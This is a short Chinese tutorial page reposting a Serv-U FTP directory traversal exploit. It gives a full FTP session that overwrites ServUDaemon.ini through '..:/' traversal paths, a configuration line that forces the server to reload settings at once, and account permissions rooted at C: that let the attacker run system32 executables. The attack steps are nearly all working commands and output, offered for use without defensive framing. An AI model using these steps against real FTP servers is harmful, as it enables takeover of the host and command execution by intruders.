来源:自学PHP网 时间:2015-04-17 13:02 作者: 阅读:次
[导读] 1.servu 6.3/6.4以及7.0,8.0等都存在目录遍历漏洞。使用可写帐号登录(如果是匿名ftp,则只有读取权限)C:\Documents and Settings\Administratorftp 127.0.0.1Connected to 127.0.0.1.220 Serv-U FTP ......
1.servu 6.3/6.4以及7.0,8.0等都存在目录遍历漏洞。
使用可写帐号登录(如果是匿名ftp,则只有读取权限) C:\Documents and Settings\Administrator>ftp 127.0.0.1 Connected to 127.0.0.1. 220 Serv-U FTP Server v6.4 for WinSock ready... User (127.0.0.1:(none)): admin 331 User name okay, need password. Password: 230 User logged in, proceed. ftp> cd / 250 Directory changed to / ftp> lcd c:\ Local directory now C:\. ftp> put ServUDaemon.ini "..:/..:/..:/..:/Program Files/RhinoSoft.com/Serv-U/Ser vUDaemon.ini" 200 PORT Command successful. 150 Opening ASCII mode data connection for ServUDaemon.ini. 226 Transfer complete. ftp: 585 bytes sent in 0.00Seconds 585000.00Kbytes/sec. 注意:每次尽量通过cd / www.2cto.com 切换到当前跟目录,以便使用..:/..:/相对的时候不会出错。 2.对于重新配置servudaemon.ini后,立即生效问题, 可以在配置文件里面加入: [GLOBAL] Version=6.3.0.0 ReloadSettings=True 3.对于执行权限: 给予帐号RWAMELCDP权限,其中e是执行,p是继承,一般根目录为c:,以便可以对system32下面的exe直接调用。 作者 hi.baidu.com/it_security |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com